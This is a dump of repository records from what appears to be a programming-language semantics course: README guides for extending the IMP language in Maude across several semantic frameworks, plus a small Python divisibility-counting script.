"alphanum_fraction": 0.6341463327407837,
"avg_line_length": 44.655174255371094,
"blob_id": "813e2d12a9d7d665c02e7d75db0daea6422a0e88",
"content_id": "92f82931c14d23d7e9b40cac683119b043c7f812",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1353,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 29,
"path": "/HW3/6-imp++/5-imp-locals/2-imp-type-system-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-----------------------------------------------------------------------\r\n--- Type system (using big-step SOS): Adding local variables to IMP ---\r\n-----------------------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal type system\r\n(based on big-step SOS) of IMP in Maude to include local variables:\r\n\r\n1) Modify imp-type-system-bigstep.maude: Modify the previous Maude commands\r\n for programs to wrap them in configurations containing a type environment\r\n that includes all the purposely undeclared variables.\r\n\r\n2) Run imp-type-system-bigstep.maude: No program should be typed, because of\r\n the missing typing rule for let. The programs will be desugared though,\r\n so one should see let statements in each of the unreduced programs. Recall\r\n that big-step SOS either reduces the entire program or reduces nothing.\r\n\r\n3) Modify imp-type-system-semantics-bigstep.maude:\r\n a) Add a rule for the typing of let.\r\n b) Replace the previous rule for programs so that they are regarded\r\n as just statements in the initial empty type environment.\r\n\r\n4) Run imp-type-system-bigstep.maude and check that all programs type properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Straightforward, as simple as it can get.\r\n"
},
{
"alpha_fraction": 0.736260712146759,
"alphanum_fraction": 0.7390223741531372,
"avg_line_length": 51.25,
"blob_id": "43983f01948fb69249d207204840658ecb0f4d06",
"content_id": "2f0b529b00d7a7c8b9d591ac4dcc485ec740382a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 3621,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 68,
"path": "/HW4/imp_pp/5-imp-locals/7-imp-cham/environment-store/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------------\r\n--- CHAM: Adding local variables to IMP ---\r\n-------------------------------------------\r\n\r\nThis folder gives an alternative CHAM definition of IMP extended with local\r\nvariables which is based on an evironment/store approach. The idea is to\r\nreplace the previous state, which was a map from program variables to values,\r\nby two maps: one called an environment which maps program variables to\r\nlocations, and another called a store which maps locations to values.\r\nSince new locations need to be generated and allocated in the store, we\r\nalso need to maintain a counter which gives the next new location.\r\nThis approach allows to easily change and recover execution envirnoments,\r\nwhich is particularly appealing when defining local scopes and functions.\r\n\r\nHere are the steps we followed in order to change the original IMP definition:\r\n\r\n1) Wrote new file environment-store.maude: This includes three modules,\r\n LOCATION, ENVIRONMENT and STORE. The first defines symbolic locations\r\n plus an operation to increment them by any number. The second defines\r\n environments as maps from variables to locations, together with the needed\r\n infrastructure. The third defines stores as maps from locations to\r\n integers, together with the needed infrastructure.\r\n\r\n2) Modify imp-cham-environment-store.maude: Include environtment-store.maude\r\n instead of state.maude and imp-semantics-cham-environment-store.maude\r\n instead of imp-semantics-cham.maude, and modify the previous Maude commands\r\n for programs to wrap them in solutions including an environment and a store\r\n that initialize all the purposely undeclared variables.\r\n\r\n3) Modify imp-semantics-cham-environment-store.maude: Add molecular\r\n support for environments, stores and locations, and modify the CHAM\r\n rules for variable lookup and update to use the environment and store\r\n instead of the state.\r\n\r\n4) Run imp-cham-environment-store.maude: No solution should completely\r\n reduce, because of the missing rule for let. The programs will be\r\n desugared and the rewriting of each program should get stuck on a let\r\n statement in the syntactic molecule.\r\n\r\n5) Modify imp-heating-cooling-cham.maude, if needed: Add the corresponding\r\n heating/cooling rules stating that let X = A in S can heated/cooled in A;\r\n this step may have been done already as part of the state-based CHAM\r\n definition in the parent directory (we import the same heating/cooling\r\n module).\r\n\r\n6) Modify imp-semantics-cham-environment-store.maude: Add the actual CHAM\r\n semantics of let and support for environment recovery. Also, remove\r\n the previous rule initializing the state for programs; since programs\r\n are now just statements, there is no need for another rule for them.\r\n\r\n7) Run imp-cham.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Regarding evaluation strategies, like for the state-based CHAM we\r\n only had to modularly and compactly add the heating/cooling rules for let.\r\n\r\n2) We had to modify the rules for update and assignment to take into account\r\n the new split of a state into an environment and a store; this was necessary\r\n and, unfortunately, non-modular.\r\n\r\n3) The rule for let is now quite clear and natural: first allocate a new\r\n location for the bound variable, then write the value bound to it to that\r\n location in the store, then evaluate the body statement of the let, and\r\n finally recover the environment to what was before the let.\r\n"
},
{
"alpha_fraction": 0.6904647946357727,
"alphanum_fraction": 0.6947771906852722,
"avg_line_length": 43.369564056396484,
"blob_id": "c93f3a49aada065a4afe9074441328033627eca3",
"content_id": "4f9128434c7a41fdabf5f632e6a9ea33315db8a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2087,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 46,
"path": "/imp/2-imp-input-output/7-imp-cham/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------\r\n--- CHAM: Adding input/output to IMP ---\r\n----------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal CHAM of IMP in\r\nMaude to include input/output:\r\n\r\n1) Modify imp-cham.maude: Include buffer.maude at the begining.\r\n\r\n2) Modify imp-semantics-cham.maude:\r\n a) Include module BUFFER in IMP-SEMANTICS-CHAM and subsort Buffer to\r\n Molecule.\r\n b) Add two molecule constants, \"input\" and \"output\", which we will use to\r\n distinguish the solutions containing the input the output buffers.\r\n b) Modify the CHAM rule of variable declarations to initialize the solution\r\n to one that also includes the input and the (empty) output moleculs.\r\n\r\n3) Modify imp-cham.maude: Wrap all program solutions into a top level solution\r\n containing also the input in some molecule. For the solutions containing\r\n statements instead of programs, add both the input and the output\r\n molecules, both empty. Add also commands to execute the new programs.\r\n\r\n4) Run imp-cham.maude: Everything working before should still work, and should\r\n include empty input and output molecules in the result solutions; the new\r\n programs should get stuck when they first encounter an input/output\r\n construct.\r\n\r\n5) Add the actual CHAM semantics of input/output, which means:\r\n a) A heating/cooling rule/equation in imp-heating-cooling.maude for print.\r\n b) A reaction rule for each of read and print in imp-semantics-cham.maude.\r\n\r\n6) Run imp-cham.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to include the input/output-specific infrastructure and rules,\r\n without changing any of the existing rules for statements or expressions.\r\n\r\n2) We also had to change the rule for programs, to initiate the working\r\n solution.\r\n\r\n3) Note that we only have non-deterministic choice seamntics for nondetIOStmt,\r\n same like in big-step SOS (and unlike in small-step SOS or RSEC).\r\n"
},
{
"alpha_fraction": 0.641406238079071,
"alphanum_fraction": 0.651562511920929,
"avg_line_length": 47.230770111083984,
"blob_id": "ab5f602ed20390dfa148138a5fcf2554b2c31a8e",
"content_id": "6d4ea247bd9f6522d0ad2b849e52339ea0d04c52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1280,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 26,
"path": "/HW4/imp/1-imp-increment/6-imp-evaluation-contexts/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------------------------------\r\n--- Evaluation contexts: Adding variable increment to IMP ---\r\n-------------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal reduction semantics\r\nwith evaluation contexts of IMP in Maude to include variable increment:\r\n\r\n1) Modify imp-evaluation-contexts.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-evaluation-contexts.maude: Everything working before should still work;\r\n the new programs should get stuck on the first statement involving increment.\r\n\r\n3) Modify imp-semantics-evaluation-contexts-x.maude, for each x in {1,2,3}:\r\n Add the actual reduction semantics with evaluation contexts of increment (one rule).\r\n\r\n4) Run imp-evaluation-contexts.maude and check that all programs evaluate properly;\r\n notice the five ways (x is 0, 1, 2, 3, or stuck) that nondetPgm evaluates.\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to add the rule for increment. Nothing else changed.\r\n\r\n2) RSEC definitions in Maude, particularly those following the first approach to\r\n represent RSEC in rewriting logic, appear to be slower than the other semantics.\r\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7105882167816162,
"avg_line_length": 51.125,
"blob_id": "0a1242a9eb25ebd3a1dd47ca603e7dfb05afb7be",
"content_id": "fd67a61d42bb202c1a14da32259d7d5f3d79e75c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2550,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 48,
"path": "/HW4/imp/2-imp-input-output/6-imp-evaluation-contexts/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------------------------\r\n--- Evaluation contexts: Adding input/output to IMP ---\r\n-------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal reduction semantics\r\nwith evaluation contexts of IMP in Maude to include a print statement:\r\n\r\n1) Modify imp-evaluation-contexts.maude: Include buffer.maude at the begining.\r\n\r\n2) Modify imp-split-plug-evaluation-contexts.maude:\r\n a) Include module BUFFER in module IMP-CONFIGURATION-EVALUATION-CONTEXTS.\r\n b) Add input and output buffers to statement configurations.\r\n c) Add an input buffer to initial configurations.\r\n d) Change the context construct, plug equation and split rule for\r\n configurations to account for the input/output as well.\r\n\r\n3) Modify imp-semantics-evaluation-contexts-x.maude, for each x in {1,2,3}:\r\n a) Change the syntax/context configurations appearing in the rules for\r\n lookup and assignment into ones also containing the input/output (kept unchanged).\r\n b) Change the rule for variable declarations to include the input and\r\n the empty output in the initial configuration.\r\n\r\n4) Modify imp-evaluation-contexts.maude: Add the input/output buffers to\r\n configurations in the same way we did it for the small-step SOS.\r\n\r\n5) Run imp-evaluation-contexts.maude: Everything working before should still work,\r\n and should include empty input/output buffers in the result configurations;\r\n the new programs should get stuck when the first input/output construct is encountered.\r\n\r\n6) Add the actual reduction semantics with evaluation contexts of read and print:\r\n a) First, add the splitting rule and the plugging equation corresponding\r\n to print's evaluation strategy (strict) into\r\n imp-split-plug-evaluation-contexts.maude. No splitting/plugging necessary for read.\r\n b) Second, add the actual reduction rules of read and print in each of the files\r\n imp-semantics-evaluation-contexts-x.maude.\r\n\r\n8) Run imp-evaluation-contexts.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We had to change several existing constructs and rules in order to accommodate\r\n the input/outpur buffers in the configuration. These changes had nothing to do with\r\n the new input/output, they were necessary in order to prepare for the input/output.\r\n\r\n2) We also had to change the rule for programs, to properly initialize the configuration.\r\n"
},
{
"alpha_fraction": 0.6040669679641724,
"alphanum_fraction": 0.6100478172302246,
"avg_line_length": 37.80952453613281,
"blob_id": "ed12b1c864d57f7d3c6c863559cab388c3e0bca2",
"content_id": "4ffd977cd1c25193b87c0e8215c8e73bbbd3452f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 836,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 21,
"path": "/imp/3-imp-halting/7-imp-cham/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------------\r\n--- CHAM: Adding abrupt termination to IMP ---\r\n----------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal CHAM of IMP in Maude\r\nto include abrupt termination:\r\n\r\n1) Modify imp-cham.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-cham.maude: Everything working before should still work;\r\n the new programs should get stuck on the first attempt to terminate abruptly.\r\n\r\n3) Modify imp-semantics-cham.maude: Add the actual CHAM semantics of abrupt termination.\r\n\r\n4) Run imp-cham.maude and check that all programs evaluate properly.\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to add the rules for abrupt termination. Nothing else changed.\r\n"
},
{
"alpha_fraction": 0.5988950133323669,
"alphanum_fraction": 0.608839750289917,
"avg_line_length": 37.34782791137695,
"blob_id": "2cced6dce6fe458fa3fce4225d6c488e9daf6996",
"content_id": "c96f5466cca7355cd4c45b91efdb0a84dab831d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 905,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 23,
"path": "/HW4/imp_pp/1-imp-increment/5-imp-msos/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------------\r\n--- MSOS: Adding variable increment to IMP ---\r\n----------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal MSOS of IMP in Maude\r\nto include variable increment:\r\n\r\n1) Modify imp-msos.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-msos.maude: Everything working before should still work;\r\n the new programs should get stuck on the first statement involving increment.\r\n\r\n3) Modify imp-semantics-msos.maude: Add the actual MSOS of increment (two rules).\r\n\r\n4) Run imp-smallstep.maude and check that all programs evaluate properly;\r\n notice the five ways (x is 0, 1, 2, 3, or stuck) that nondetPgm evaluates.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to add the rule for increment. Nothing else changed.\r\n"
},
{
"alpha_fraction": 0.6731945872306824,
"alphanum_fraction": 0.677478551864624,
"avg_line_length": 42.16216278076172,
"blob_id": "93680e7ccb956b225f2cd4582278ee00c48ba6b2",
"content_id": "eb2b56bb8c38bc062b95ef4dec9bde8a53808e39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1634,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 37,
"path": "/imp/5-imp-locals/7-imp-cham/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------------\r\n--- CHAM: Adding local variables to IMP ---\r\n-------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal CHAM of IMP\r\nin Maude to include local variables:\r\n\r\n1) Modify imp-cham.maude: Modify the previous Maude commands\r\n for programs to wrap them in solutions including a state that\r\n initializes all the purposely undeclared variables.\r\n\r\n2) Run imp-cham.maude: No solution should completely reduce,\r\n because of the missing rule for let. The programs will be desugared\r\n and the rewriting of each program should get stuck on a let statement\r\n in the syntactic molecule.\r\n\r\n3) Modify imp-heating-cooling-cham.maude: Add the corresponding\r\n heating/cooling rules stating that let X = A in S can heated/cooled in A.\r\n\r\n4) Modify imp-semantics-cham.maude: Add the actual CHAM semantics of let.\r\n Also, remove the previous rule initializing the state for programs; since\r\n programs are now just statements, there is no need for another rule for them.\r\n\r\n5) Run imp-cham.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to add the heating/cooling rules and the reaction rule for let.\r\n This was very modular and compact.\r\n \r\n2) However, like for reduction semantics with evaluation contexts,\r\n the CHAM rule for let is very tricky. On the other hand, the CHAM\r\n never aimed at being a purely syntactic semantic framework\r\n (on the contrary, actually), so the rule is not that unorthodox in CHAM.\r\n"
},
{
"alpha_fraction": 0.7124640345573425,
"alphanum_fraction": 0.7161661982536316,
"avg_line_length": 50.84782791137695,
"blob_id": "bc3ee7c99f17502cd09cf0028b0ab878aa30ad48",
"content_id": "c0d81f90b7be2ce44238e44565a9d3f7fac37b7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2431,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 46,
"path": "/imp/1-imp-increment/4-imp-denotational/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "------------------------------------------------------\r\n--- Denotational: Adding variable increment to IMP ---\r\n------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the original denotational\r\nsemantics of IMP in Maude to include variable increment:\r\n\r\n1) Modify imp-denotational.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-denotational.maude: Everything working before should still work;\r\n the new programs should be partially reduced to some functional representations;\r\n these functional representations cannot be reduced all the way through because\r\n of the missing denotation of increment (note the subterms of the form [[++ x]]).\r\n\r\n3) Modify imp-semantics-denotational.maude:\r\n a) Make sure that the denotation of each expression is now a (partial) function\r\n from states to pairs (value,state).\r\n b) Modify the existing equations giving the denotation of IMP constructs\r\n using expressions to take into account the side effect of the expressions.\r\n\r\n4) Run imp-denotation.maude: Everything working before should still work the same way;\r\n the new programs should still get stuck with missing denotations for increment.\r\n\r\n5) Add the actual denotational semantics of increment, which consists of one equation.\r\n\r\n6) Run imp-denotational.maude and check that all programs evaluate properly;\r\n notice the all programs are determinstic, including nondetPgm.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) The addition of pairs as results of denotation functions changed the implicit\r\n types of these functions, so one has to think slightly differently; in particular,\r\n one has to make sure that one does not forget to use the projection functions.\r\n\r\n2) Alomst every equation had to change to accomodate the new denotation functions\r\n for expressions; the only equations which stayed unchaged were those for the\r\n empty block, for sequential composition, and for programs.\r\n\r\n3) The resulting denotational semantic definition is completely deterministic.\r\n That is because our mathematical domains are domains of functions, and functions\r\n are deterministic by their very nature. More complicated domains are needed to\r\n capture non-determinism (e.g., power domains), but those would lead to very\r\n inefficient executions, so we do not do it here.\r\n"
},
{
"alpha_fraction": 0.7120377421379089,
"alphanum_fraction": 0.7155782580375671,
"avg_line_length": 50.95833206176758,
"blob_id": "d37916a4aeccb0adcbb91996c02039f061b32aea",
"content_id": "26ccb9331bc9a6cd99402a807434b1f259236262",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2542,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 48,
"path": "/HW3/6-imp++/3-imp-halting/3-imp-smallstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "--------------------------------------------------------\r\n--- Small-step SOS: Adding abrupt termination to IMP ---\r\n--------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the original small-step SOS\r\nof IMP in Maude to include abrupt termination:\r\n\r\n1) Modify imp-smallstep.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-smallstep.maude: Everything working before should still work;\r\n the new programs should get stuck on their first attempt to terminate abruptly.\r\n\r\n3) Modify imp-semantics-smallstep.maude:\r\n a) Add a new configuration construct for halting configurations, that is, for\r\n configurations which, when encountered, should end the computation immediately.\r\n The halting configurations will be generated by division by zero and/or halt.\r\n b) The existing small-step SOS rules do not need to change, but we need to add\r\n a new conditional rule for each existing conditional rule, to propagate the\r\n halting configurations through each non-constant language construct.\r\n c) Add the actual small-step SOS rules for division by zero and for halt,\r\n each of them yielding a halting configuration.\r\n\r\n5) Run imp-smallstep.maude: Everything working before should still work the same way,\r\n and the new programs should yield a halting configuration. One could stop here,\r\n but recall that, for the sake of uniformity, we decided to output a normal\r\n configuration at the end of the execution, no matter whether the program was\r\n terminated normally or abruptly.\r\n\r\n6) Add the new rule transforming the halting configuration into a normal configuration.\r\n\r\n7) Run imp-smallstep.maude and check that all programs evaluate properly,\r\n resulting in configurations that look the same way no matter whether the\r\n program was terminated normally or abruptly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We had to add a new type of configuration to distinguish halting situations\r\n in order to propagate them through the language constructs.\r\n\r\n2) For each argument of each language construct we had to add a new rule propagating\r\n the potential halting configuration through that language construct.\r\n\r\n3) The addition of a new rule to dissolve the halting configuration and terminate the\r\n program with a normal configuration generates an additional and artificial small step,\r\n thus affecting the intended computational granularity of the language.\r\n"
},
{
"alpha_fraction": 0.6585003733634949,
"alphanum_fraction": 0.6651818752288818,
"avg_line_length": 42.900001525878906,
"blob_id": "0be9d98857e80f6e6b705adcb12fbe634052596d",
"content_id": "9e10dd863d4a053f72de7560367240b6b56a9a0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1347,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 30,
"path": "/imp/4-imp-threads/5-imp-msos/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------------\r\n--- MSOS: Adding dynamic threads to IMP ---\r\n-------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal MSOS of IMP in Maude\r\nto include dynamic threads:\r\n\r\n1) Modify imp-msos.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-msos.maude: Everything working before should still work;\r\n the new programs should get stuck on their first attempt to spawn a thread.\r\n\r\n3) Modify imp-semantics-msos.maude:\r\n a) Add the two MSOS rules propagating the reduction permission from S to spawn(S) and\r\n from S2 to spawn(S1) ; S2;\r\n b) Add the MSOS rule reducing spawn(skip) to skip;\r\n c) Add the structural equation enforcing right associativity of sequential composition.\r\n\r\n5) Run imp-smallstep.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) The propagation rules and the rule for dissolving threads are normal and modular.\r\n\r\n2) However, we also had to add a structural equation for enforcing right associativity of sequential\r\n composition. This equation is an artifact of the new dynamic threads feature (to keep the\r\n definition of the latter simpler and modular) and does not involve the new syntax (spawn).\r\n"
},
{
"alpha_fraction": 0.6813353300094604,
"alphanum_fraction": 0.6868993639945984,
"avg_line_length": 47.42499923706055,
"blob_id": "b19ef4592ab521ee7e5d41389085d73801e9770b",
"content_id": "841023814a1f5951a794e26e836c7836823aebb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1977,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 40,
"path": "/imp/4-imp-threads/1-imp-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "---------------------------------------------------\r\n--- Big-step SOS: Adding dynamic threads to IMP ---\r\n---------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the original big-step SOS\r\nof IMP in Maude to include dynamic threads:\r\n\r\n1) Modify imp-bigstep.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-bigstep.maude: Everything working before should still work;\r\n the new programs should stay unchanged (big-step SOS either reduces a program\r\n all the way through, or it does not reduce it at all).\r\n\r\n3) Modify imp-semantics-bigstep.maude:\r\n a) Add a rule evaluating the spawned statement.\r\n b) Add a rule allowing to first evaluate S2 and then S1 in a context of the form\r\n spawn S1 S2.\r\n\r\n4) Run imp-bigstep.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) The above was a desperate attempt to define concurrency in big-step SOS;\r\n the reality is that big-step SOS is simply unsuitable for concurrency because,\r\n unless it is turned into a collection semantics, which would involve radical\r\n changes and would be very inefficient (or better say, infeasible) when executed,\r\n it cannot caputure all the interleaving behaviors of concurrent threads.\r\n\r\n2) The first rule for spawn, in combination with sequential composition, says more or\r\n less that spawn can be ignored, in the sense that the spawning thread can do all\r\n the work: first execute the child thread code, then the main thread code;\r\n this is, indeed, a possible behavior;\r\n\r\n3) While the second rule for spawn also captures the behaviors where the main\r\n thread code is executed first and then the child thread code, it still\r\n does not capture all the desired interleaved behaviors. This is, unfortunatetly,\r\n the best we can do with big-step SOS (without turning to a collection semantics).\r\n"
},
{
"alpha_fraction": 0.7097689509391785,
"alphanum_fraction": 0.7130117416381836,
"avg_line_length": 49.39583206176758,
"blob_id": "777577a85af285922400aa947d27d157255b8da3",
"content_id": "4976dda8b250f43f50506e129b6413f13702a2e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2467,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 48,
"path": "/HW4/imp/3-imp-halting/4-imp-denotational/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "------------------------------------------------------\r\n--- Denotational: Adding abrupt termination to IMP ---\r\n------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the original denotational\r\nsemantics of IMP in Maude to include abrupt termination:\r\n\r\n1) Modify imp-denotational.maude: Add Maude commands for executing the new\r\n programs.\r\n\r\n2) Run imp-denotational.maude: Everything working before should still work;\r\n the new programs will either get stuck or make Maude not terminate while\r\n searching for a fixed-point.\r\n\r\n3) Modify imp-semantics-denotational.maude:\r\n a) Add new CPO constants error, halting and ok, to be used as halting signals.\r\n b) Modify the existing equations giving the denotation of IMP constructs\r\n using expressions to take into account the fact that expressions can now\r\n\t evaluate to an error (when division-by-zero is performed).\r\n c) Same for the denotation of IMP constructs using statements, to take into\r\n account the fact that statements can now evaluate to a halting state; to\r\n\t distinguish halting states from normal states, the denotation of statements\r\n\t is a function returning pairs (state,halting status), where \"halting status\"\r\n\t is either \"halting\" or \"ok\".\r\n d) Modify the denotation of programs to silently ignore the halting status.\r\n\r\n4) Run imp-denotation.maude: Everything working before should still work the same way;\r\n the new programs should still either get stuck with missing denotations for abrupt\r\n termination or do not terminate searching indefinetely for a fixed-point.\r\n\r\n5) Add the actual denotational semantics of the implicit division by zero and\r\n of the explicit halt statement; the former is an additional case in the existing\r\n denotation of division, while the latter requires a new equation.\r\n\r\n6) Run imp-denotational.maude and check that all programs evaluate properly;\r\n notice that programs terminate normally, no matter whether their execution was\r\n normally or abruptly terminated.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) New CPO constants had to be added and the denotations of expressions and\r\n of statements had to change to generate and propagate halting signals.\r\n\r\n2) Unfortunately, alomst every equation had to change; the only two equations\r\n which stayed unchaged were those for integer and for Boolean constants.\r\n"
},
{
"alpha_fraction": 0.4989648163318634,
"alphanum_fraction": 0.5300207138061523,
"avg_line_length": 25.108108520507812,
"blob_id": "75e5b3ae93b5b92862914b5981b3ae58215be6cb",
"content_id": "c8ffa02cad0fe4ba602bbb31fc223b51e491a694",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 966,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 37,
"path": "/count.py",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "def divide(b,a):\n '''\n if there exits a k, s.t. a = k*b then b divides a\n a | b if any for some k, b=k*a\n '''\n for k in range(1,b+1):\n if b == a*k:\n return True, k\n return False, None\n\ndef condition(x):\n x_divisible_by_2, k = divide(2,x)\n if k != None:\n k_divisible_by_2, kp = divide(2,k)\n return x_divisible_by_2 and k_divisible_by_2\n\ndef condition2(x):\n divisors_x = [ k for k in range(1,x) if x % k == 0 and k != 1 ]\n #print(divisors_x)\n invariant = x % 2 == 0\n #print(f'invariant = {invariant}')\n for k in divisors_x:\n #print(k)\n two_div_k = k % 2 == 0\n #print(f'two_div_k = {two_div_k}')\n invariant = invariant and two_div_k\n return invariant\n\ndef count(n):\n for x in range(0,n+1):\n #print(f'--- x = {x}')\n if condition2(x):\n print(x)\n\ncount(n=100)\n#print(f'condition2(4) = {condition2(4)}')\n#print(f'condition2(8) = {condition2(8)}')\n"
},
{
"alpha_fraction": 0.6968061327934265,
"alphanum_fraction": 0.7008547186851501,
"avg_line_length": 45.29787063598633,
"blob_id": "fe1de53ad4e71742dc08bcc8aa3e3bc275ba98d5",
"content_id": "cadcafc068bc13d75b11cdeadbfac9e1596d3bfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2223,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 47,
"path": "/HW3/imp/2-imp-input-output/1-imp-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "------------------------------------------------\r\n--- Big-step SOS: Adding input/output to IMP ---\r\n------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal big-step SOS\r\nof IMP in Maude to include the read and print language constructs:\r\n\r\n1) Modify imp-bigstep.maude: Include buffer.maude at the begining,\r\n add the input buffer to all configurations, and add Maude commands\r\n for executing the new programs at the end.\r\n\r\n2) Run imp-bigstep.maude: Everything working before should still work;\r\n the new programs should remain unreduced (big-step SOS either reduces a\r\n program all the way through, or it does not reduce it at all).\r\n\r\n3) Modify imp-semantics-bigstep.maude:\r\n a) Include module BUFFER in module IMP-CONFIGURATIONS-BIGSTEP.\r\n b) Add an input buffer to all configurations holding expressions,\r\n an input buffer to non-result configurations holding statements,\r\n\t and both an input buffer and an output buffer to result state configuration.\r\n c) Modify all the existing big-step SOS rules to work with the new\r\n configurations, making sure the inputs are propagated correctly and the\r\n\t outputs are collected properly.\r\n d) Change the rule for variable declarations to report both the remaining input\r\n and the output generated by evaluating the top-level statement.\r\n\r\n4) Run imp-bigstep.maude: Everything working before should still work, and\r\n should include and empty output buffer in the result configurations;\r\n the new programs still stay unchanged.\r\n\r\n6) Add the actual big-step SOS of read and print, each consisting of one rule.\r\n\r\n7) Run imp-bigstep.maude and check that all programs evaluate properly.\r\n Notice that big-step SOS is not able to capture all the behaviors of the\r\n nondeterministic program (it only captures nondeterministic choice).\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) All configurations had to change in order to also hold the input and/or output.\r\n\r\n2) Consequently, all rules had to change, too.\r\n\r\n3) It does not capture all the desired non-determinism, it only captures\r\n nondeterministic choice semantics.\r\n"
},
{
"alpha_fraction": 0.6753462553024292,
"alphanum_fraction": 0.680886447429657,
"avg_line_length": 46.783782958984375,
